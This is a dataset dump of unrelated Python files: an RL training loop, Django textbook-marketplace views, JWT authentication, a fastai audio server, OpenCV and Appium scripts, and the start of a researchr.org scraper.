step=frame_idx)\n\n if self.record_qvals:\n with torch.no_grad():\n qvals = self.base_model(self.preprocess_obss([orig_obs], device=self.device)).cpu().numpy()\n self.qvals.append(qvals)\n qval_dict = {\"BIG_LEFT\": qvals[0][0], \"SMALL_LEFT\": qvals[0][1], \"FORWARD\": qvals[0][2], \"SMALL_RIGHT\": qvals[0][3], \"BIG_RIGHT\": qvals[0][4], }\n experiment.log_metrics(qval_dict, step=frame_idx)\n if done:\n success = 0.0\n if reward >= 2.0:\n success = 1.0\n self.episode_success.append(success)\n experiment.log_metric(\"episode_success_rate\", np.sum(self.episode_success)/len(self.episode_success))\n experiment.log_metric(\"num_episodes_finished\", len(self.episode_success))\n experiment.log_metric(\"episode_length\", episode_length, step=frame_idx)\n\n episode_length_list.append(episode_length)\n episode_length = 0\n\n self.obs = self.env.reset()\n self.all_rewards.append(episode_reward)\n experiment.log_metric(\"episode_reward\", episode_reward, step=frame_idx)\n episode_reward = 0\n\n if len(self.all_rewards) % self.target_update == 0:\n self.target_model.load_state_dict(self.base_model.state_dict())\n\n if len(self.all_rewards) % self.log_interval == 0 and len(self.all_rewards) > 0:\n print(\"Number of Trajectories:\", len(self.all_rewards),\n \"| Number of Frames:\", frame_idx,\n \"| Success Rate:\", np.mean(self.episode_success[-100:]),\n \"| Average Episode Reward:\", np.mean(self.all_rewards[-100:]),\n \"| Losses:\", np.mean(self.losses[-100:]),\n \"| Epsilon:\", epsilon,\n \"| Length of Episode:\", np.mean(episode_length_list[-100:]))\n status[\"num_frames\"] = frame_idx\n\n # # Curriculum learning\n # if np.mean(self.episode_success[-100:]) >= self.curriculum_threshold:\n # print(\"empirical_win_rate: \" + str(np.mean(self.episode_success[-100:])))\n # print(\"Increasing Difficulty by 1!\")\n # status[\"difficulty\"] += 1\n # self.env.set_difficulty(status[\"difficulty\"])\n # print(\"New Difficulty:\", status[\"difficulty\"])\n if len(self.all_rewards) % self.save_interval == 0 and len(self.all_rewards) > 0:\n # Save losses and rewards.\n with open(model_dir+'/losses.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.losses)\n with open(model_dir+'/rewards.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.all_rewards)\n with open(model_dir+'/episode_success.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.episode_success)\n\n # Save status\n path = os.path.join(model_dir, \"status.json\")\n with open(path, \"w\") as file:\n json.dump(status, file)\n\n # Saving model\n if torch.cuda.is_available():\n self.base_model.cpu()\n torch.save(self.base_model, model_dir+\"/model.pt\")\n print(\"Done saving model and logs...\")\n if torch.cuda.is_available():\n self.base_model.cuda()\n\n # Save q values if debug mode\n if self.record_qvals:\n with open(model_dir + '/q_vals.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.qvals)\n\n if len(self.all_rewards) % self.target_update == 0:\n self.base_model.embed_imgs = []\n self.base_model.embed_gps = []\n with experiment.test():\n obs = self.env.reset()\n spl = self.env.shortest_path_length()\n for action in spl:\n obs = self.preprocess_obss([obs], device=self.device)\n self.base_model.act(obs, 0)\n obs, reward, done, _ = self.env.step(action)\n self.process_embeddings(model_dir)\n\n\n def process_embeddings(self, model_dir):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n\n if self.base_model.embed_imgs:\n img_means = [img.mean().item() for img in self.base_model.embed_imgs]\n img_medians = [img.median().item() for img in self.base_model.embed_imgs]\n ax.plot(img_means, label=\"img_means\")\n ax.plot(img_medians, label=\"img_medians\")\n\n gps_means = [gps.mean().item() for gps in self.base_model.embed_gps]\n gps_medians = [gps.median().item() for gps in self.base_model.embed_gps]\n ax.plot(gps_means, label=\"gps_means\")\n ax.plot(gps_medians, label=\"gps_medians\")\n plt.legend()\n if not os.path.isdir(model_dir + \"/figs\"):\n os.mkdir(model_dir + \"/figs\")\n plt.savefig(model_dir + \"/figs/embedding_means_\" + str(len(self.episode_success)))\n plt.close()\n\n def compute_td_loss(self):\n\n state, action, reward, next_state, done = self.replay_buffer.sample(self.batch_size)\n\n obs = self.preprocess_obss(state, device=self.device)\n next_obs = self.preprocess_obss(next_state, device=self.device)\n action = torch.LongTensor(action).to(device=self.device)\n reward = torch.FloatTensor(reward).to(device=self.device)\n done = torch.FloatTensor(done).to(device=self.device)\n\n q_values = self.base_model(obs)\n next_q_values = self.target_model(next_obs).detach()\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n expected_q_value = reward + (self.discount * next_q_value * (1 - done))\n\n # Compute Huber loss\n loss = F.smooth_l1_loss(q_value, expected_q_value)\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n for param in self.base_model.parameters():\n param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n return loss\n\n\nclass ReplayBuffer(object):\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def push(self, state, action, reward, next_state, done):\n state = np.expand_dims(state, 0)\n next_state = np.expand_dims(next_state, 0)\n\n self.buffer.append((state, action, reward, next_state, done))\n\n def sample(self, batch_size):\n state, action, reward, next_state, done = zip(*random.sample(self.buffer, batch_size))\n return np.concatenate(state), action, reward, np.concatenate(next_state), done\n\n def __len__(self):\n return len(self.buffer)\n","sub_path":"torch_rl/torch_rl/algos/new_algo.py","file_name":"new_algo.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221070463","text":"from models import MonModel, change_time\nimport time\n\n\nclass Board(MonModel):\n \"\"\"\n __fields__ = [\n '_id',\n ('id', int, -1),\n ('type', str, ''),\n ('deleted', bool, False),\n ('created_time', int, 0),\n ('updated_time', int, 0),\n \"\"\"\n __fields__ = MonModel.__fields__ + [\n ('title', str, ''),\n ]\n\n @classmethod\n def update(cls, form):\n board_id = int(form.get('id', -1))\n whitelist = ['id', 'title']\n Board.ori_update(whitelist, board_id, form)\n","sub_path":"server_normal_Flask_beautiful/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80038822","text":"import cv2\r\nimg=cv2.imread(\"lz.jpg\")\r\n#cv2.COLOR_BGR2GRAY灰色\r\n#cv2.IMREAD_COLOR彩色\r\n#cv2.COLOR_BGR2HSV\r\n#cv2.COLOR_BGR2LAB\r\ncv2.namedWindow(\"Image\")#创建窗口并显示图像\r\nhsv=cv2.cvtColor(img,cv2.IMREAD_COLOR)\r\nres=cv2.resize(hsv,(800,500),interpolation=cv2.INTER_CUBIC)\r\ncv2.imshow(\"Image\",res)\r\nk=cv2.waitKey(0)\r\nif k==27:\r\n cv2.destroyAllWindows()#释放窗口\r\n","sub_path":"fristtry.py","file_name":"fristtry.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99258111","text":"from django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext as _\nfrom rest_framework import exceptions\nfrom rest_framework_jwt.authentication import BaseJSONWebTokenAuthentication, JSONWebTokenAuthentication\n\nfrom rest_framework_jwt.settings import api_settings\n\n\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\njwt_get_username_from_payload = api_settings.JWT_PAYLOAD_GET_USERNAME_HANDLER\n\n\nclass CustomJWTWebTokenAuthentication(BaseJSONWebTokenAuthentication):\n def authenticate_credentials(self, payload):\n \"\"\"\n Returns an user that matches the payload's user id and email unless it is not active or blocked.\n \"\"\"\n User = get_user_model()\n username = jwt_get_username_from_payload(payload)\n\n if not username:\n msg = _('Invalid payload.')\n raise exceptions.AuthenticationFailed(msg)\n\n try:\n user = User.objects.get_by_natural_key(username)\n except User.DoesNotExist:\n msg = _('Invalid signature.')\n raise exceptions.AuthenticationFailed(msg)\n else:\n if not user.is_active:\n msg = _('User account is disabled.')\n raise exceptions.AuthenticationFailed(msg)\n\n if user.is_blocked:\n msg = _('User account is currently blocked.')\n raise exceptions.AuthenticationFailed(msg)\n\n return user\n\n\nclass CustomJSONWebTokenAuthentication(CustomJWTWebTokenAuthentication, JSONWebTokenAuthentication):\n pass\n","sub_path":"pomodorr/auth/auth_classes.py","file_name":"auth_classes.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321257112","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport os\nimport sys\nsys.path.append(\"../../../../../../import\")\nimport setup\nimport element\nfrom random import randint\nfrom appium import webdriver\nfrom time import sleep\n\nclass SimpleIOSTests(unittest.TestCase):\n\n def setUp(self):\n # set up appium\n setup.load_for6(self)\n setup.ck_login_ordinary(self)\n sleep(1)\n\n def test_ordinary_otherset_case1(self):#原先密碼與新密碼皆未輸入\n element.livehome_element(self)\n self.info.click()\n sleep(2)\n element.livehome_info(self)\n self.other_set.click()\n sleep(1)\n element.other_set(self)\n self.login_value1 = int (self.multiple_devices.get_attribute('value')) +1\n if self.login_value1 > 1 :\n self.login_value1 = 0\n self.multiple_devices.click()\n sleep(1)\n self.pk_record_back.click()\n sleep(1)\n element.livehome_info(self)\n self.other_set.click()\n sleep(1)\n element.other_set(self)\n self.login_value2 = int (self.multiple_devices.get_attribute('value'))\n self.assertEqual(self.login_value1,self.login_value2)\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(SimpleIOSTests)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"pk_test/livehome/livehome_info/ordinary/ordinary_info/info_otherset/ordinary_otherset_case1.py","file_name":"ordinary_otherset_case1.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312928036","text":"#!/usr/bin/env python\n\ndef num_ways_x(n):\n if n == 0 : return 1\n total = 0\n for i in {1,2}:\n if (n -i)>=0 :\n total += num_ways_x(n-i)\n return total\n\ndef num_ways_x_bottom_up(n):\n\n if n == 0 : return 1\n nums = [0]*(n+1)\n nums[0]= 1\n\n for i in range (1,n+1):\n total = 0\n for j in [1,2,4]:\n if i-j >=0:\n #print(\"i-j\",i-j)\n print (nums[i-j])\n total += nums[i-j]\n print(total)\n nums[i] = total#nums[1]=1,nums[2]=1,nums[3]=\n return nums[n]\n\n\nprint(num_ways_x(4))\n\nprint (num_ways_x_bottom_up(4))\n","sub_path":"stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"264187058","text":"import aiohttp\nimport asyncio\nimport uvicorn\nimport ast\nimport numpy as np\nfrom fastai2 import *\nfrom fastai2.vision.all import *\nfrom fastai2_audio.core.all import *\nfrom fastai2_audio.augment.all import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\n\n\nexport_file_url = 'https://storage.googleapis.com/fastai-export-bucket/export.pkl' # google cloud bucket\n#export_file_url = 'https://drive.google.com/uc?export=download&id=1NryOFwHs6T3HlkG_dsSCslWgcviRv4h-' # google drive\n\nexport_file_name = 'export.pkl'\n\nwith open('app/classes.txt', 'r') as f:\n classes = ast.literal_eval(f.read())\n\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\nasync def download_file(url, dest):\n print(\"Attempting pkl file download\")\n print(\"url:\", url)\n print(\"dest:\", dest)\n if dest.exists(): return \"dest.exists()\"\n async with aiohttp.ClientSession() as session:\n print(\"async session\")\n async with session.get(url) as response:\n print(\"response\", response)\n data = await response.read()\n #print(\"data response\",data)\n with open(dest, 'wb') as f:\n print(\"writing data\")\n f.write(data)\n print(\"file\", f)\n\ndef get_file(r): return '../content/train_curated/'+r['fname']\ndef get_label(r): return r['labels'].split(',') # split labels on ','\n\nasync def setup_learner():\n await download_file(export_file_url, path/export_file_name)\n try:\n print(\"pkl file exists?:\", path/export_file_name, os.path.exists(path/export_file_name))\n print(\"dl pkl file size:\", Path(path/export_file_name).stat().st_size)\n print(\"loading learner...\")\n learn = load_learner(path/export_file_name)\n print(\"learner loaded\")\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'index.html'\n return HTMLResponse(html_file.open().read())\n\n# method from https://github.com/aquietlife/whisp/blob/master/app/server.py\n@app.route('/analyze', methods=['POST'])\nasync def analyze(request):\n form = await request.form()\n bytes = await (form[\"file\"].read())\n wav = BytesIO(bytes) \n utc_time = str(int(time.time()))\n sound_file = \"tmp/sound_\" + utc_time + \".wav\"\n _,_,preds = learn.predict(sound_file)\n predictions = learn.dls.vocab[np.argwhere(preds > 0.3).squeeze()]\n return JSONResponse({'classifications': str(predictions)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\") # render\n #uvicorn.run(app=app, host='0.0.0.0', port=Port, log_level=\"info\") #heroku\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348973613","text":"import cv2\r\nimport os\r\n\r\n###to work with video cam on the device use 0 or -1 to point at resource\r\ncap = cv2.VideoCapture(0) #Video file path can also be used\r\n\r\n#to save the video captured, use cv2.VideoWriter\r\nfourcc= cv2.VideoWriter_fourcc(*'mp4v') #compression code used for video codec, eg avi, mp4 etc\r\nprint(fourcc) #for mp4v = 1983148141 this is the fourcc code\r\nout = cv2.VideoWriter('sample_output.mp4',fourcc, 20 , (640,480) )\r\n\r\nprint(cap.isOpened())\r\n\r\ntry:\r\n while cap.isOpened():\r\n ret, frame = cap.read()\r\n if ret == True:\r\n print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n cv2.imshow(\"frame\", frame)\r\n out.write(frame)\r\n\r\n if cv2.waitKey(2) & 0xFF==ord('q'):\r\n break #waitKey waits for 2 sec for user key input, if not give takes -1, ord gets unicode of char\r\n else:\r\n print('stream_ended')\r\n break\r\nexcept:\r\n print('done with video')\r\n\r\ncap.release() #release hold on camera if specified\r\ncv2.destroyWindow('frame') #remove all display windows\r\nprint('done')\r\n","sub_path":"OpenCV_video_stream_read_write.py","file_name":"OpenCV_video_stream_read_write.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292943424","text":"from django.core.exceptions import ValidationError\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, ListView\nfrom .forms import CreateUserForm, CreateProfileForm, ListBookForm, MessageForm, AddRatingForm\nfrom .models import Book, Cart, Wishlist, Transaction, Rating, Profile, Message, Reported\nfrom .filters import BookFilter\n# Create your views here.\n\n\ndef userLog(request):\n return render(request, 'login.html')\n\ndef register(request):\n return render(request, 'signup.html')\n\ndef messaging(request):\n return render(request, 'messaging.html')\n\ndef hometemp(request):\n return render(request, 'hometemp.html')\n\ndef buyList(request):\n return render(request, 'buyerListing.html')\n\ndef logoutuser(request):\n logout(request)\n return redirect('../')\n\n#Each time a user is created, a cart and wishlist are also created\n@receiver(post_save, sender=User)\ndef createcartandwishlist(sender, instance, created, **kwargs):\n if created:\n Cart.objects.create(owner=instance)\n Wishlist.objects.create(owner=instance)\n Rating.objects.create(user=instance)\n\nclass HomePageView(ListView):\n model = Book\n template_name= 'search.html'\n\nclass SearchResultsView(ListView):\n model = Book\n template_name = 'searchresults.html'\n def get_queryset(self): # new\n query = self.request.GET.get('q')\n object_list = Book.objects.filter(\n Q(title__icontains=query) | Q(author__icontains=query) | Q(\n ISBN13__icontains=query) | Q(edition__icontains=query) | Q(\n condition__icontains=query) | Q(field__icontains=query))\n return object_list\n\n#This function is called when a user goes to create an account.\ndef signup(request):\n form = UserCreationForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n raw_password = form.cleaned_data.get('password1')\n raw_email = form.cleaned_data.get('username')\n if 'bc.edu' in raw_email:\n user = form.save()\n user.save()\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect('../profile/')\n else:\n messages.error(request,\"Please enter a valid BC email.\")\n return redirect('signup')\n else:\n form = CreateUserForm()\n return render(request, 'register.html', {'form': form})\n\n#This function is called when users go to create a profile after first signing up.\ndef createprofile(request):\n p_form = CreateProfileForm(initial={'user':request.user})\n if request.method == \"POST\":\n p_form = CreateProfileForm(request.POST)\n if p_form.is_valid():\n Profile = p_form.save(commit=False)\n Profile.user = request.user\n Profile = p_form.save()\n User = request.user\n User.save()\n cleanfirstname = p_form.cleaned_data.get('first_name')\n cleanlastname = p_form.cleaned_data.get('last_name')\n User.first_name = cleanfirstname\n User.last_name = cleanlastname\n User.email = User.username\n User.save()\n return redirect('../')\n else:\n form = CreateProfileForm()\n return render(request, 'createprofile.html', {'p_form':p_form})\n\n#This function is called when the user goes to create a book listing. The ISBN number is confirmed.\n@login_required\ndef createlisting(request):\n newlistingform = ListBookForm(initial={'user':request.user})\n if request.method == \"POST\":\n newlistingform = ListBookForm(request.POST, request.FILES)\n if newlistingform.is_valid():\n isbnone = newlistingform.cleaned_data['ISBN13']\n isbntwo = newlistingform.cleaned_data['ISBN13Conf']\n if (isbnone == isbntwo):\n newlistingform = newlistingform.save(commit=False)\n newlistingform.user = request.user\n newlistingform = newlistingform.save()\n messages.success(request, \"Success! Your book has been listed!\")\n return redirect('../')\n elif (isbnone!=isbntwo):\n messages.success(request, \"Make sure ISBN13 fields match.\")\n return redirect('newlisting')\n return render(request, 'sellerListing.html', {'ListBookForm':ListBookForm})\n\n#This function is related to viewing all available books and filtering based on user input.\ndef searchbooks(request):\n allbooks = Book.objects.all()\n myFilter = BookFilter(request.GET, queryset=allbooks)\n allbooks = myFilter.qs\n context = {'books':allbooks,'filter': myFilter,}\n return render(request, 'searchfilter.html', context)\n\ndef changeOrdering(request):\n allbooks = Book.objects.all()\n myFilter = BookFilter(request.GET, queryset=allbooks)\n allbooks = myFilter.qs\n context = {'books': allbooks, 'filter': myFilter}\n return render(request, 'searchfilter2.html', context)\n\n\n##These functions are related to the cart and wishlist:\n #adding to cart\n #adding to wishlist\n #changing from wishlist to cart\n #viewing wishlist\n #viewing cart\n\n@login_required\ndef addtocart(request, bookid):\n booktoadd = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.add(booktoadd)\n cart.save()\n messages.success(request, \"Success! A book has been added to the cart!\")\n return redirect('search')\n\n@login_required\ndef addtowishlist(request, bookid):\n booktoadd = Book.objects.get(uuid=bookid)\n wishlist, created = Wishlist.objects.get_or_create(owner=request.user)\n wishlist.item.add(booktoadd)\n wishlist.save()\n messages.success(request, \"Success! A book has been added to your wishlist!\")\n return redirect('search')\n\n@login_required\ndef viewcart(request):\n currentcart = Cart.objects.get(owner=request.user)\n context = {'cart': currentcart}\n return render(request, 'cart.html', context)\n\n@login_required\ndef viewwishlist(request):\n currentwishlist = Wishlist.objects.get(owner=request.user)\n context = {'wishlist': currentwishlist}\n return render(request, 'wishlist.html', context)\n\n@login_required\ndef switchfromwishlisttocart(request, bookid):\n booktoswitch = Book.objects.get(uuid=bookid)\n currentwishlist = Wishlist.objects.get(owner = request.user)\n currentcart = Cart.objects.get(owner = request.user)\n currentwishlist.item.remove(booktoswitch)\n currentcart.cartitem.add(booktoswitch)\n messages.success(request, \"Success! A book from your wishlist has been added to your cart.\")\n return redirect('cart')\n\n@login_required\ndef removefromcart(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.remove(booktoremove)\n cart.save()\n messages.success(request, \"Success! A book has been removed from your cart!\")\n return redirect('cart')\n\n@login_required\ndef removefromwishlist(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n wishlist, created = Wishlist.objects.get_or_create(owner=request.user)\n wishlist.item.remove(booktoremove)\n wishlist.save()\n messages.success(request, \"Success! A book has been removed from your wishlist!\")\n return redirect('wishlist')\n\n#These two functions have to deal with the user viewing their own book listings and removing if necessary.\n@login_required\ndef viewmyprofile(request):\n mycurrentbooks = Book.objects.filter(user = request.user)\n myprofile = Profile.objects.get(user = request.user)\n myratings = Rating.objects.get(user = request.user)\n myrecommendations = Book.objects.filter(field = myprofile.field)[0:3]\n context = {'mycurrentbooks':mycurrentbooks, 'myprofile':myprofile, 'myrecommendations':myrecommendations, 'myratings':myratings}\n return render(request, 'myprofile.html', context)\n\n@login_required\ndef removelisting(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n booktoremove.delete()\n messages.success(request, \"Success! Your book has been successfully removed from listings.\")\n return redirect('myprofile')\n\n\n@login_required\ndef reportedbook(request,bookid):\n booktoreport = Book.objects.get(uuid=bookid)\n userreporting = request.user\n userreported = booktoreport.user\n new_report = Reported(reporter = userreporting, reported = userreported, reportedbook = booktoreport)\n new_report.save()\n booktoreport.reported = True\n booktoreport.save()\n messages.success(request, \"Thank you! This book has been reported. An admin may follow up with you if more information is needed.\")\n return redirect('searchfilter')\n\ndef reporteduser(request,transactionid):\n reportattransaction = Transaction.objects.get(uuid=transactionid)\n booktoreport = Book.objects.get(uuid=reportattransaction.book.uuid)\n userreporting = request.user\n userreported = booktoreport.user\n new_report = Reported(reporter = userreporting, reported = userreported, reportedtransaction=reportattransaction)\n new_report.save()\n booktoreport.reported = True\n booktoreport.save()\n reportattransaction.buyerhasrated = True\n reportattransaction.sellerhasrated = True\n reportattransaction.status = 'Completed'\n reportattransaction.save()\n messages.success(request, \"Thank you! This user has been reported. An admin may follow up with you if more information is needed.\")\n return redirect('viewmytransactions')\n\n\n#This function is called when the user goes to message the user from the cart. It will create a transaction instance.\n@login_required\ndef createtransaction(request, bookid):\n newtransaction = Transaction.objects.create(buyer=request.user, book=Book.objects.get(uuid=bookid), seller=Book.objects.get(uuid=bookid).user)\n booktoremove = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.remove(booktoremove)\n cart.save()\n messages.success(request, \"Success! You have messaged the owner and have created a transaction. This item will be removed from your cart.\")\n return redirect('viewtransactionmessages', selleruser=booktoremove.user, buyeruser=request.user, transactionid=newtransaction.uuid)\n\n@login_required\ndef viewmytransactions(request):\n transactionsasseller = Transaction.objects.filter(seller=request.user) #get all transactions where the current user is the seller\n transactionsasbuyer = Transaction.objects.filter(buyer=request.user) #get all transactions where the current user is the buyer\n context = {'transactionsasseller':transactionsasseller, 'transactionsasbuyer':transactionsasbuyer}\n return render(request, 'mytransactions.html', context)\n\n@login_required\ndef viewtransactionmessages(request, selleruser, buyeruser, transactionid):\n transactiontoview = Transaction.objects.get(uuid=transactionid)\n messagesseller = User.objects.get(username=selleruser)\n messagesbuyer = User.objects.get(username=buyeruser)\n messages = Message.objects.filter(transaction__in=Transaction.objects.filter(seller=messagesseller).filter(buyer=messagesbuyer)).order_by('creation_time')\n\n if messagesseller == request.user:\n notcurrentuser = messagesbuyer\n else:\n notcurrentuser = messagesseller\n\n newmessageform = MessageForm()\n if request.method==\"POST\":\n newmessageform=MessageForm(request.POST)\n if newmessageform.is_valid():\n newmessageform = newmessageform.save(commit=False)\n newmessageform.sender = request.user\n newmessageform.recipient = notcurrentuser\n newmessageform.transaction = transactiontoview\n newmessageform = newmessageform.save()\n return redirect('viewtransactionmessages', selleruser=messagesseller, buyeruser=messagesbuyer, transactionid=transactiontoview.uuid)\n context={'transactionmessages':messages, 'transaction':transactiontoview, 'form':newmessageform}\n return render(request, 'transactionmessages.html', context)\n\n\n@login_required\ndef createmessage(request):\n newmessageform = MessageForm()\n if request.method == \"POST\":\n newmessageform = MessageForm(request.POST)\n if newmessageform.is_valid():\n newmessageform = newmessageform.save(commit=False)\n newmessageform.sender = request.user\n newmessageform = newmessageform.save()\n return render(request, 'messages.html', {'MessageForm':MessageForm})\n\n@login_required\ndef donewithtransaction(request, doneusername, transactionid):\n doneuser = User.objects.get(username=doneusername)\n \n transaction = Transaction.objects.get(uuid=transactionid)\n if doneuser==transaction.buyer:\n transaction.buyerhasrated = True\n transaction.save()\n else:\n transaction.sellerhasrated = True\n transaction.save()\n\n if transaction.buyerhasrated and transaction.sellerhasrated:\n #transaction is complete, mark book as sold\n booktomarkassold = transaction.book \n booktomarkassold.sold = True\n booktomarkassold.save()\n\n if doneuser==transaction.buyer:\n addratingform = AddRatingForm()\n if request.method == \"POST\":\n addratingform = AddRatingForm(request.POST)\n if addratingform.is_valid():\n addedrating = addratingform.cleaned_data['addedrating']\n usertoupdate = User.objects.get(username=transaction.seller)\n currentusersellerrating = float(Rating.objects.get(user=usertoupdate).sellerrating)\n currentnumberofsellerratings = float(Rating.objects.get(user=usertoupdate).numberofsellerratings)\n Rating.objects.filter(user=usertoupdate).update(sellerrating=((currentnumberofsellerratings*currentusersellerrating)+(addedrating))/(currentnumberofsellerratings+1)) #(9*(5.0)+1*(3.0))/10\n Rating.objects.filter(user=usertoupdate).update(numberofsellerratings=currentnumberofsellerratings+1)\n messages.success(request, \"Thank you for rating this user!\")\n return redirect('viewmytransactions')\n else:\n addratingform = AddRatingForm()\n if request.method == \"POST\":\n addratingform = AddRatingForm(request.POST)\n if addratingform.is_valid():\n addedrating = addratingform.cleaned_data['addedrating']\n usertoupdate = User.objects.get(username=transaction.buyer)\n currentuserbuyerrating = float(Rating.objects.get(user=usertoupdate).buyerrating)\n currentnumberofbuyerratings = float(Rating.objects.get(user=usertoupdate).numberofbuyerratings)\n Rating.objects.filter(user=usertoupdate).update(buyerrating=((currentnumberofbuyerratings*currentuserbuyerrating)+(addedrating))/(currentnumberofbuyerratings+1)) #(9*(5.0)+1*(3.0))/10\n Rating.objects.filter(user=usertoupdate).update(numberofbuyerratings=currentnumberofbuyerratings+1)\n messages.success(request, \"Thank you for rating this user!\")\n return redirect('viewmytransactions')\n\n return render(request, 'addrating.html', {'form':addratingform})","sub_path":"bookbargains/bbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523374174","text":"import json\n# -*- coding: utf-8 -*-\nimport httplib\nimport random\nimport time\nimport re\nfrom exceptions import *\n\n\nclass ResearchrClass:\n def __init__(self):\n self.conn = None\n self.encoding = \"UTF-8\"\n self.firstLimitMin = 0.9\n self.firstLimitMax = 2.5\n self.secondLimitMin = 70\n self.secondLimitMax = 100\n self.thirdLimitMin = 500\n self.thirdLimitMax = 600\n self.filename = None\n self.userAgents = [\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1\",\n \"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0\",\n \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1\",\n \"Opera/6.01 (Windows XP; U) [de]\",\n \"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63\",\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; de) Opera 8.02\",\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.50 [en]\",\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17\"\n ]\n \n def searchPublications(self, key, index):\n \"\"\"\n Search publications on researchr.org.\n\n @type key: string\n @param key: The search term.\n @type index: number\n @param index: The page of results.\n @rtype: dict\n @return: Index, kind of search, array of results and the search term.\n \"\"\"\n data = self.__makeRequest(\"search/publication\", key, index)\n return self.__decode(data)\n\n def searchConferences(self, key, index):\n \"\"\"\n Search conferences on researchr.org.\n\n @type key: 